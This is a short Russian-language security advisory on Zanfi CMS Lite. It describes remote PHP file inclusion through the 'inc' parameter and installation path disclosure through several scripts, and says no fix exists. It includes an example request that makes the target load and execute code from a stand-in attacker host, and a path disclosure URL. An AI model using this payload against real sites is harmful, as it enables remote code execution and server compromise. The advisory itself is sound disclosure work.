Выполнение произвольных php команд в Zanfi CMS Lite

Описание:
Обнаружено несколько уязвимостей в Zanfi CMS Lite. Удаленный атакующий может выполнить произвольный php сценарий и системные команды на уязвимой системе и получить данные об установочной директории сервера.

Удаленный атакующий может указать в качестве параметра переменной ‘inc’ путь к удаленному php сценарию, который будет выполнен на уязвимой системе. Пример:

http://[target]/index.php?inc=http://[attacker]

Удаленный атакующий может напрямую обратиться к нескольким сценариям и поучить данные об установочной директории. Пример:

http://[target]/cms/adm_pages.php

Уязвимые сценарии: 'corr_pages.php', 'del_block.php', 'del_page.php', 'footer.php', и 'home.php'.

URL производителя: www.zanfi.nl/cms/index.php

Решение: Решение на данный момент не существует.